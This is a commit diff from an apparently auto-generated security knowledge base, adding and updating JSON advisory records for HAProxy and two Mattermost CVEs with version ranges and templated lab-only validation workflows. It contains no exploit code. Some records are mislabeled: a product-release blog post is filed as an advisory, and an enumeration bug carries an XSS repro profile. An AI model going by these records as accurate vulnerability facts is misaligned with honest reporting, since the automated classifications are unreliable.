hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动

更新: 413 个文件 - 2026-03-24 03:45:07

浏览代码
这个提交包含在:
hao
2026-03-24 03:45:08 -07:00
父节点 cd808b4358
当前提交 1e447fe97f
修改 413 个文件,包含 23191 行新增9255 行删除
下载 Patch 文件 下载 Diff 文件 展开所有文件 折叠所有文件

146
08-threat-intel/registry/advisories/haproxy--ecfe8a1346.json 普通文件
查看文件

@@ -0,0 +1,146 @@
{
"canonical_id": "haproxy--ecfe8a1346",
"system_id": "haproxy",
"display_name": "HAProxy",
"category": "servers",
"advisory_mode": "server",
"title": "Announcing HAProxy Unified Gateway 1.0",
"summary": "HAProxy Unified Gateway (HUG) 1.0 has officially landed \u2014 delivering unified, high-performance, cloud-native application routing. Learn how HUG's open-source design simplifies and scales Kubernetes.",
"published_at": "Tue, 24 Mar 2026 00:00:00 +0000",
"updated_at": "Tue, 24 Mar 2026 00:00:00 +0000",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0",
"secondary_source_urls": [],
"aliases": [],
"cve_ids": [],
"ghsa_ids": [],
"osv_ids": [],
"affected_versions": [],
"fixed_versions": [],
"package_name": null,
"render_markdown": false,
"case_path": null,
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"status": "triage",
"triage_reasons": [
"missing affected/fixed version details"
],
"entity_refs": [
{
"entity_id": "haproxy",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "haproxy",
"official": true
}
],
"affected_components": [
{
"name": "HAProxy",
"entity_id": "haproxy",
"scope": "core",
"package_name": null,
"official": true
}
],
"affected_version_ranges": [],
"fixed_version_ranges": [],
"introduced_version": null,
"patched_version": null,
"version_evidence_sources": [
"https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0"
],
"affected_version_refs": [],
"fixed_version_refs": [],
"patched_version_refs": [],
"version_sync_confidence": "low",
"advisory_scope": "core",
"version_confidence": "low",
"version_gap_reason": "official bulletin or aggregated source did not expose explicit affected/fixed versions",
"version_resolution_needed": true,
"workflow": {
"workflow_id": "haproxy--ecfe8a1346--workflow",
"vuln_family": "proxy-boundary",
"entry_surface": "proxy-header-or-trust-boundary",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: \u9700\u8981\u4ece\u516c\u544a\u3001\u9501\u6587\u4ef6\u3001\u7248\u672c\u9875\u6216\u5173\u4e8e\u9875\u9762\u4eba\u5de5\u786e\u8ba4\u7248\u672c\u547d\u4e2d",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `core`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "reverse-proxy-or-edge-client",
"affected_version_assertion": [
"\u9700\u8981\u4ece\u516c\u544a\u3001\u9501\u6587\u4ef6\u3001\u7248\u672c\u9875\u6216\u5173\u4e8e\u9875\u9762\u4eba\u5de5\u786e\u8ba4\u7248\u672c\u547d\u4e2d"
],
"trigger_vector": "\u5bf9 `proxy-boundary` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/middleware",
"/x-forwarded-* trust path"
],
"input_shape": "\u63d0\u4ea4\u53d7\u63a7\u4ee3\u7406\u5934\u6216\u6765\u6e90\u5934\uff0c\u9a8c\u8bc1\u4fe1\u4efb\u8fb9\u754c\u548c\u56de\u6e90\u9274\u6743\u3002",
"expected_unsafe_behavior": "\u4ec5\u51ed\u4ee3\u7406\u5934\u5373\u53ef\u8d8a\u8fc7\u9274\u6743\u6216\u6765\u6e90\u63a7\u5236\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6",
"\u4e0a\u6e38\u4ee3\u7406\u4e0e\u5e94\u7528\u5c42\u5bf9 Content-Length / Transfer-Encoding / forwarded headers \u7684\u89e3\u91ca\u5dee\u5f02"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `\u53d7\u5f71\u54cd\u7248\u672c\u533a\u95f4` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `\u4fee\u590d\u7248\u672c`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `proxy-boundary` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "needs-version-gap-review"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"HAProxy Blog Feed"
],
"source_kinds": [
"rss-feed"
],
"candidate_count": 1,
"entity_ref_count": 1,
"advisory_scope": "core",
"version_confidence": "low",
"workflow_id": "haproxy--ecfe8a1346--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-21386.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-21386",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to use consistent error responses when handling the /mute command",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to use consistent error responses when handling the /mute command which allows an authenticated team member to enumerate private channels they are not authorized to know about via differing error messages for nonexistent versus private channels. Mattermost Advisory ID: MMSA-2026-00588",
"published_at": "2026-03-16T15:30:46Z",
"updated_at": "2026-03-23T18:56:15.398070Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-5mr9-crcg-8wh2",
"https://github.com/mattermost/mattermost/commit/5bb5261c72faa476558a694c23581d24b734da41",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-21386",
"GO-2026-4744",
"GHSA-5mr9-crcg-8wh2"
],
"cve_ids": [
"CVE-2026-21386"
],
"ghsa_ids": [
"GHSA-5mr9-crcg-8wh2"
],
"osv_ids": [
"GHSA-5mr9-crcg-8wh2",
"GO-2026-4744"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260130144323-5bb5261c72fa",
"5.3.2-0.20260130144323-5bb5261c72fa",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-21386.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260130144323-5bb5261c72fa",
"5.3.2-0.20260130144323-5bb5261c72fa",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260130144323-5bb5261c72fa",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"https://github.com/advisories/GHSA-5mr9-crcg-8wh2",
"https://github.com/mattermost/mattermost/commit/5bb5261c72faa476558a694c23581d24b734da41",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260130144323-5bb5261c72fa"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-21386--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa, introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa, introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260130144323-5bb5261c72fa`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-21386--workflow"
}
}

61
08-threat-intel/registry/advisories/mattermost--CVE-2026-22545.json
查看文件

@@ -7,19 +7,21 @@
"title": "Mattermost fails to validate user's authentication method when processing account auth type switch",
"summary": "Mattermost versions 10.11.x <= 10.11.10 fail to validate user's authentication method when processing account auth type switch which allows an authenticated attacker to change account password without confirmation via falsely claiming a different auth provider.. Mattermost Advisory ID: MMSA-2026-00583",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-19T19:31:20.982512Z",
"updated_at": "2026-03-23T18:56:23.696710Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-rv67-7w2g-7976",
"https://github.com/mattermost/mattermost/commit/ced9a56e3988fe9fd4559d45f9971dbd562e2218",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-22545",
"GO-2026-4786",
"GHSA-rv67-7w2g-7976"
],
"cve_ids": [
@@ -29,21 +31,27 @@
"GHSA-rv67-7w2g-7976"
],
"osv_ids": [
"GHSA-rv67-7w2g-7976"
"GHSA-rv67-7w2g-7976",
"GO-2026-4786"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988",
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260127144908-ced9a56e3988",
"5.3.2-0.20260127144908-ced9a56e3988",
"10.11.11",
"11.2.3",
"11.3.1"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
@@ -86,19 +94,25 @@
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260127144908-ced9a56e3988",
"5.3.2-0.20260127144908-ced9a56e3988",
"10.11.11",
"11.2.3",
"11.3.1"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=11.3.0-rc1, fixed<11.3.1",
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260127144908-ced9a56e3988",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"https://github.com/advisories/GHSA-rv67-7w2g-7976",
"https://github.com/mattermost/mattermost/commit/ced9a56e3988fe9fd4559d45f9971dbd562e2218",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
@@ -108,14 +122,19 @@
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1"
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1"
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127144908-ced9a56e3988"
@@ -127,29 +146,29 @@
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-22545--workflow",
"vuln_family": "xss",
"entry_surface": "web-ui-render-path",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988, introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988",
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `xss` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/editor",
"/preview",
"/rendered-content"
"/repo"
],
"input_shape": "\u53d7\u63a7 HTML/Markdown/\u5bcc\u6587\u672c\u8f93\u5165\uff0c\u89c2\u5bdf\u6e32\u67d3\u4e0a\u4e0b\u6587\u662f\u5426\u5931\u53bb\u7f16\u7801\u6216\u51c0\u5316\u3002",
"expected_unsafe_behavior": "\u8f93\u5165\u5728\u76ee\u6807\u4e0a\u4e0b\u6587\u6267\u884c\u6216\u88ab\u6d4f\u89c8\u5668\u89e3\u91ca\u4e3a\u4e3b\u52a8\u5185\u5bb9\u3002",
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
@@ -171,7 +190,7 @@
